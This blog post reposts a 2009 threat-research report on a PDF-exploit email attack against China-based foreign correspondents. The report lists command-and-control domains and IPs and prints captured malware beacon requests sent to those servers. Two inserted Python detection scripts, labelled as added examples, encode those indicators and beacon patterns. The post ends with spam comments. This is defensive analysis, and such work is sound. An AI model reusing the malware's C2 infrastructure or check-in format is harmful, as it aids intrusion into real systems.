I just received the below analysis on the infected email attack on China-based foreign correspondents, via an email (whose sender I do not know).

Their credibility: I do not know the person who sent it, their organization or their expertise, level of credibility, etc. One of the organizations cited, Malware Lab, appears to have been founded this weekend. They do include their email addresses if anyone wants to follow up with them.

Their findings: The attack used a weakness in the Adobe PDF format to send computers back to compromised computers at Taiwan universities. There is no conclusive evidence to show that the attack was orchestrated by the Chinese government, but one of the few groups that would have ready access to the personal email addresses of news assistants in China is the government. (While the names of news assistants would almost never appear in print, their names must be registered with the government.)

Targeted Malware Attack on Foreign Correspondents based in China

By Nart Villeneuve (nart dot villeneuve at utoronto.ca) and Greg Walton
(g.walton at secdev dot ca) | Sept. 26, 2009.

Overview

There have been recent reports of malware attacks on journalists based in China. The attacks specifically targeted Chinese employees working for media organizations, including Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa.1 These employees received an email from “Pam ”, who claimed to be an editor with the Straits Times, carrying a PDF attachment that contained malware. When opened, malicious code in the PDF exploits Adobe Reader and drops the malware on the target’s computer.

These attacks correlate with reports of increased security measures within China as a result of the 60th anniversary of the founding of the People’s Republic of China.2 These increased security measures have also been extended to the Internet, with providers of anti-censorship technology reporting increased levels of blocking that prevents people from accessing the web sites of foreign media and news organizations.3

This short briefing from the Malware Lab and the Information Warfare Monitor analyzes a sample from one of the attacks on behalf of an international news agency that operates in China, and a member of the Foreign Correspondents Club in Beijing.4

Key Findings:

* The content of the email, and the accompanying malicious attachment, are in well written English and contain accurate information. The email details a reporter’s proposed trip to China to write a story on China’s place in the global economy; all the contacts in the malicious attachment are real people that are knowledgeable about or have a professional interest in China’s economy.

* The domain names used as “command & control” servers for the malware have been used in previous targeted attacks dating back to 2007. The malware domain names, as in previously documented cases, only resolve to real IP addresses for short periods of time.

* The malware exploits vulnerabilities in the Adobe PDF Reader, and its behaviour matches that of malware used in previous attacks dating back to 2008. This malware was found on computers at the Offices of Tibet in London, and has used political themes in malware attachments in the past.

* The IP addresses currently used by the malware are assigned to Taiwan. One of the servers is located at the National Central University of Taiwan, and is a server to which students and faculty connect to download anti-virus software. The second is an IP address assigned to the Taiwan Academic Network. These compromised servers present a severe security problem as the attackers may have substituted their malware for anti-virus software used by students, employees, and faculty at the National Central University.

Analysis

The email sent to the foreign correspondents from “Pam ” appears to be customized and targeted. The context of the letter and the attached PDF, “Interview list.pdf”, is specific to journalists. The email itself is focused on setting up meetings for journalists in China, and the attached PDF contains a list of genuine contacts in China that relate to the context of the email. The name of the hotel and its address are accurate. Moreover, the purpose for the trip to China, to research the “annual economic survey,” correlates with the World Economic Forum’s release of its “Global Competitiveness Report” on September 8, 2009 and the conference that followed in Dalian, China on September 10-12, 2009.5

The PDF contains malicious code that exploits Adobe Acrobat and drops malware on the target’s computer. Only 3 of 41 anti-virus products used by Virus Total detected the malicious code embedded in the PDF.6

When opened, the PDF displays a list of contacts. The contacts listed in the PDF appear to be genuine. All the names and titles in the document are accurate. However, some appear to be former positions held by the individuals, indicating that the document is somewhat dated. It is possible that this document is a legitimate document stolen from a compromised machine, modified to include malware, and used as a lure to entice people to open the malicious attachment.

After opening the attachment, malware is silently dropped on the target’s computer.

The malware attempts DNS resolution for three domains: mail.amberice.com, menberservice.3322.org, and zwy2007.pc-officer.com. Often the domain names will not resolve to proper IP addresses; other times they will resolve only for a short period of time. In this case, two of the domain names eventually resolved:

menberservice.3322.org | 140.115.182.230

zwy2007.pc-officer.com | 210.240.85.250

The domain name zwy2007.pc-officer.com resolves to 210.240.85.250 which is an IP address assigned to the Taiwan Academic Network, Ministry of Education Computer Center. The malware was unable to make successful connections to this IP address.

However, the domain name “pc-officer.com” is a well known malware domain name that has been used in previous attacks. In 2007, Maarten Van Horenbeeck investigated cases of targeted attacks that used a “petition to the International Olympic Committee on Chinese human rights violations” as the theme.7 In those cases, the malware attempted to connect to:

ihe1979.3322.org

ding.pc-officer.com | 61.219.152.125

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

A similar case was investigated by F-Secure earlier this year.8 In that case, the domain names that the malware attempted to connect to were:

ihe1979.3322.org

feng.pc-officer.com | 216.255.196.154

feng.pc-officer.com | 211.234.122.84

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

The domain menberservice.3322.org eventually resolved to 140.115.182.230, which reverse resolves to avirus.is.ncu.edu.tw. This location (https://avirus.is.ncu.edu.tw:4343/officescan/console/html/ClientInstall/) is at the National Central University of Taiwan, and it is used by students and faculty to download anti-virus software.9 This is potentially a severe security problem, as the attackers may have substituted their malware for anti-virus software for use by students, employees, and faculty at the National Central University.

menberservice.3322.org | 140.115.182.230 | avirus.is.ncu.edu.tw

The malware connects to this location and begins sending and receiving information:

POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1
User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)
Host: menberservice.3322.org
Content-Length: 682
Proxy-Connection: keep-alive
Pragma: no-cache

.new_host_42

HTTP/1.1 200 OK
Date: Tue Sep 22 21:41:10 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The malware matches behaviour documented by ThreatExpert earlier this year.10 Documents with names such as “Urgent Appeal to Secretary Hillary Clinton.doc” and “Days with ITSN Tibet in My Eyes.doc” contained malware that connected to mmwbzhij.meibu.com on ports 8585 and 8686.

http://mmwbzhij.meibu.com:8686/[random characters].[random file extension]

where the [random characters] string may look similar to:

* qRXycRXuwJ11749

* PqJNBkcPDm18630

* ZPDPyZkZcV23661

and [random file extension] can be any of the following: rm, mov, mp3, pdf.

This matches behaviour that the Information Warfare Monitor documented in the “Tracking GhostNet” report11 after analyzing a compromised computer at the Offices of Tibet in London, U.K. In that case, there were connections to oyd.3322.org which resolved to 58.141.132.66 on port 4501:

POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: oyd.3322.org
Content-Length: 46
Proxy-Connection: keep-alive
Pragma: no-cache

new_host_24

HTTP/1.1 200 OK
Date: Wed Oct 01 23:05:15 2008
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 44
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

A follow-up visit to OOT-London found another malware infection connecting to mmwbzhij.meibu.com which resolved to 216.131.67.95 on port 8686:

POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: mmwbzhij.meibu.com
Content-Length: 32
Proxy-Connection: keep-alive
Pragma: no-cache

.new_host_23

HTTP/1.1 200 OK
Date: Fri Apr 10 22:49:22 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive
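The three captured exchanges above share one shape: a POST to a high port, a ten-letter-plus-digits filename with a media or document extension, the same "MSIE 5.0.2; Win32" user-agent, and a body beginning with "new_host_". The following is an added detection example, not code from the report or its authors. It assumes raw request text is available from a proxy or packet capture; the scoring weights, the threshold, and the last two sample requests (an unlisted host and a benign request) are constructed for illustration, while the first sample and the indicator lists come from the report.

```python
"""Heuristic detector for the HTTP beacon shape seen in the captured exchanges.
Added example: scoring weights, THRESHOLD and the last two samples are constructed."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Command-and-control hostnames named in the report.
KNOWN_C2_HOSTS = {
    "mail.amberice.com", "menberservice.3322.org", "zwy2007.pc-officer.com",
    "oyd.3322.org", "mmwbzhij.meibu.com",
}
# Dynamic-DNS parents the report says the attackers favour.
DYNAMIC_DNS_PARENTS = {"3322.org", "meibu.com"}
# Path shape common to every capture: ten letters, four or five digits,
# then one of the extensions listed in the report.
BEACON_PATH = re.compile(r"^/[A-Za-z]{10}\d{4,5}\.(?:rm|mov|mp3|pdf|rar)$")
# User-Agent string repeated across the 2008 and 2009 captures.
BEACON_UA = re.compile(r"^Mozilla/4\.\d+\.\d+ \(compatible; MSIE 5\.0\.2; Win32\)$")
# Body prefix "new_host_NN", in two captures preceded by a single stray byte.
BEACON_BODY = re.compile(rb"^.?new_host_\d+")
THRESHOLD = 3  # constructed: a total at or above this is reported as a beacon

@dataclass
class Request:
    method: str
    host: str
    port: int
    path: str
    headers: dict
    body: bytes

def parse_request(raw: bytes) -> Request:
    """Parse an HTTP/1.x request whose target is absolute (proxy form) or origin form."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "://" not in target:  # origin form: take host and port from the Host header
        target = "http://" + headers.get("host", "") + target
    parts = urlsplit(target)
    return Request(method, (parts.hostname or "").lower(), parts.port or 80,
                   parts.path, headers, body)

def score_request(req: Request) -> tuple[int, list[str]]:
    """Return (score, reasons); each reason names one matched indicator."""
    score, reasons = 0, []
    def hit(points, why):
        nonlocal score
        score += points
        reasons.append(why)
    if req.host in KNOWN_C2_HOSTS:
        hit(3, "host is a C2 name from the report")
    if ".".join(req.host.split(".")[-2:]) in DYNAMIC_DNS_PARENTS:
        hit(1, "host is under a dynamic-DNS parent")
    if BEACON_PATH.match(req.path):
        hit(2, "random-name path with media/document extension")
    if BEACON_UA.match(req.headers.get("user-agent", "")):
        hit(1, "MSIE 5.0.2 / Win32 user-agent")
    if BEACON_BODY.match(req.body):
        hit(2, "body starts with the new_host_ check-in marker")
    if req.method == "POST" and req.port not in (80, 443):
        hit(1, "POST to a non-standard port")
    return score, reasons

def is_beacon(raw: bytes) -> bool:
    return score_request(parse_request(raw))[0] >= THRESHOLD

def _req(lines, body=b""):
    return "\r\n".join(lines).encode("latin-1") + b"\r\n\r\n" + body

# Sample 1: the 2009 capture from the report (body as the report prints it).
SAMPLE_2009 = _req([
    "POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1",
    "User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)",
    "Host: menberservice.3322.org",
    "Content-Length: 682",
    "Proxy-Connection: keep-alive",
    "Pragma: no-cache",
], b".new_host_42")
# Sample 2: constructed request to an unlisted host that keeps the beacon shape.
SAMPLE_UNLISTED = _req([
    "POST /aBcDeFgHiJ12345.mp3 HTTP/1.1",
    "User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)",
    "Host: updates.example.invalid:8585",
    "Pragma: no-cache",
], b"new_host_7")
# Sample 3: constructed benign request.
SAMPLE_BENIGN = _req([
    "GET /index.html HTTP/1.1",
    "Host: www.example.com",
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) Firefox/3.5",
])

if __name__ == "__main__":
    for label, raw in [("2009 capture", SAMPLE_2009),
                       ("unlisted host", SAMPLE_UNLISTED), ("benign", SAMPLE_BENIGN)]:
        score, reasons = score_request(parse_request(raw))
        print(f"{label}: score={score} beacon={score >= THRESHOLD} {reasons}")
```

The point of scoring rather than matching hostnames alone is the report's own observation that the names change while the check-in shape does not: the second sample reaches the threshold on path, user-agent, body and port without touching any listed indicator.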

The domain names 3322.org and meibu.com are dynamic DNS services that allow the attackers to map domain names to IP addresses they control. In these cases, the attackers are not required to register domain names. Attackers typically favour dynamic DNS services such as these.12 The attackers have pointed these domains to IPs on the networks of Black Oak Computers Inc, CA, USA, and C&M Communication Co., Ltd., Korea, in addition to the Taiwan Academic Network.

The control servers on pc-officer.com have, in the past, resolved to IP addresses on One Eighty Networks, WA, USA, KIDC, Korea and HINET, Taiwan, in addition to the National Central University of Taiwan’s server where students and faculty download anti-virus software.
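The report notes twice that the control names resolve to real addresses only for short periods, and that they sit under dynamic-DNS parents such as 3322.org and meibu.com. Both observations can be turned into a check on a feed of periodic resolutions (a passive-DNS source or a scheduled resolver on a watchlist). The following is an added example, not code from the report or its authors; the observation records are constructed (hourly polls over two days, with a stable documentation-range address for the control domain), and only the domain names and the two answers come from the report.

```python
"""Flag domains that resolve only in short windows, as the report describes.
Added example: the observation data below is constructed for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

# Dynamic-DNS parents named in the report.
DYNAMIC_DNS_PARENTS = {"3322.org", "meibu.com"}

def parent_domain(name: str) -> str:
    parts = name.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])

def is_dynamic_dns(name: str) -> bool:
    return parent_domain(name) in DYNAMIC_DNS_PARENTS

def resolution_windows(observations):
    """observations: iterable of (datetime, domain, ip_or_None), any order.
    Returns {domain: [(first_seen, last_seen, ip), ...]}, one entry per run of
    consecutive polls with the same answer; None means no answer/NXDOMAIN."""
    by_domain = defaultdict(list)
    for ts, dom, ip in sorted(observations, key=lambda o: (o[1], o[0])):
        by_domain[dom.lower()].append((ts, ip))
    windows = {}
    for dom, polls in by_domain.items():
        runs = []
        for ts, ip in polls:
            if runs and runs[-1][2] == ip:
                runs[-1] = (runs[-1][0], ts, ip)   # extend the current run
            else:
                runs.append((ts, ts, ip))          # answer changed: new run
        windows[dom] = runs
    return windows

def intermittent_domains(observations, max_live=timedelta(hours=6)):
    """Domains that were unresolvable at some point and whose every resolvable
    window lasted at most max_live (threshold is a constructed default)."""
    flagged = {}
    for dom, runs in resolution_windows(observations).items():
        live = [r for r in runs if r[2] is not None]
        dead = [r for r in runs if r[2] is None]
        if live and dead and all(end - start <= max_live for start, end, _ in live):
            flagged[dom] = {
                "ips": sorted({ip for _, _, ip in live}),
                "live_windows": len(live),
                "dynamic_dns": is_dynamic_dns(dom),
            }
    return flagged

def build_sample_observations():
    """Constructed hourly polls, 22-23 Sep 2009: two report domains answer briefly,
    one never answers, and a control domain answers constantly."""
    t0 = datetime(2009, 9, 22, 0, 0)
    obs = []
    for h in range(48):
        ts = t0 + timedelta(hours=h)
        obs.append((ts, "mail.amberice.com", None))
        obs.append((ts, "menberservice.3322.org",
                    "140.115.182.230" if 20 <= h <= 23 else None))
        obs.append((ts, "zwy2007.pc-officer.com",
                    "210.240.85.250" if 30 <= h <= 31 else None))
        obs.append((ts, "www.example.com", "198.51.100.7"))  # constructed control
    return obs

if __name__ == "__main__":
    for dom, info in intermittent_domains(build_sample_observations()).items():
        print(dom, info)
```

Because a window's length is measured between the first and last poll that returned the same answer, the poll interval bounds how fine-grained the check can be; the report's own observations were made by the malware's repeated lookups, which is the equivalent of a very frequent poll. A domain that never resolves (mail.amberice.com in the sample) is not flagged here; it still deserves a watchlist entry, since the report expects such names to come alive later.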

Attribution Issues

In general, determining attribution in these types of attacks is difficult. Analyzing domain registration and other contextual information can occasionally provide some useful leads.

The domain names pc-officer.com and amberice.com were registered in 2007 to “wei zheng” using the email address “[email protected]” and the phone number “86-010-4564654.” There are some links between these data and the registration data of other domain names. For example, “wei zheng” also registered “fclinux.com” with the email address “[email protected]” and the phone number “86 10 13810358162.” This “wei zheng” also registered “winxpupdata.com” with the phone number “86 10 13810358162” and the email address “[email protected].” A variety of domain names, such as ag365.com, are registered to “Hetu Time Networking Technology Ltd.” in the name of “lin long” with the email address “[email protected].” However, the technical contact is “lin hai” with the email address “[email protected].”

It is unclear what the connection is here as “hetu.cn” is a domain registrar and hosting company. It is possible that the information is not connected to the attackers, but others who have been compromised by the attackers.

There is another avenue of inquiry that impacts attribution. It is not clear how the email addresses of the recipients, who are local employees for foreign journalists, were acquired by the attackers.13 The Reuters news story about the targeted email attacks makes an important point about those who were targeted:

The “Pam Bourdon” emails on Monday targeted Chinese news assistants, whose names often do not appear on news reports and who must be hired through an agency that reports to the Foreign Ministry.14

Considering that the contact information of these assistants was not publicly known, but was known to China’s Foreign Ministry, an element of suspicion is raised concerning the involvement of the latter. However, there are alternative explanations for how the attackers were able to assemble the list of contacts. These attackers have been actively compromising targets since at least 2007, and likely compile lists of new targets from information acquired through previous exploits. In fact, the accuracy of the email used in this case, and the malicious attachment, suggest that the attackers leveraged information stolen from previously compromised computers.

There is no evidence that directly implicates the government of China in these attacks.

However, both the timing and targets of the attack do raise questions. With the 60th anniversary of the People’s Republic of China fast approaching, it is difficult to dismiss attacks on high profile media targets such as Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa as random events. These organizations were targeted directly, but the motivation of the attackers remains unknown. Furthermore, the use of compromised servers at the National Central University of Taiwan and the Taiwan Academic Network will no doubt add to an already tense relationship between China and Taiwan.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is a public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The ML combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.


Greg Walton is the Editor of The Infowar Monitor. The Information Warfare Monitor is a joint project of the Advanced Network Research Group, part of the Cambridge Security Programme, The SecDev Group and the Citizen Lab, an interdisciplinary laboratory based at the Munk Centre for International Studies, University of Toronto.

http://www.infowar-monitor.net/


13 comments

  1. Lina

    They are very credible — Nart Villeneuve and Greg Walton are both with Citizen Lab at the University of Toronto; InfoWar Monitor is a joint project between Citizen Lab and SecDev, a Canadian think tank; MalWare Lab, IIRC, also includes a number of the Citizen Lab members.

    Nart Villeneuve (http://www.nartv.org) specifically worked on the *excellent* InfoWar Monitor-ONI Asia report on TOM-Skype's monitoring of chats, Breaching Trust, and the InfoWar Monitor report on PRC cyber espionage, Tracking GhostNet.

    Greg Walton wrote the excellent Golden Shield report for the International Centre for Human Rights and Democratic Development (http://www.dd-rd.ca/site/publications/index.php…).

    Both are frequent commentators on Chinese censorship online and “hacktivism”.

  2. rickv

    Lame, but several security podcasts covered PDF exploits last year, and again in March when a new exploit surfaced. News org IT admins should be on top of this, and correspondents *must* listen (and should be receiving in-house emails about such). The updates were out there (just horribly late; thanks, Adobe). But since these things are common in PDFs and other docs, it may be useful to view these within Sandboxie. (note, I am *not* a pen tester of any sort)

  3. Pingback: Analysis of cyber attacks on foreign journalists in China « Journalism, Journalists and the World

  4. Pingback: Amid tensions over Chinese censorship, US unveils strategy for cyberspace | Penn Olson

  5. National Central University of Taiwan, and it is used by students and faculty to download anti-virus software.9

  6. yes, Excessive weight has constantly been a setback for myself. I tasted the correct tablet and I lost much fat. Afterward I determined to refrain from having it because I already got the natural body. I propose you, possibly this is the best thing you need for a normal shape.

  7. Pingback: babyliss hot hair brush

  8. Pingback: film terbaru jason statham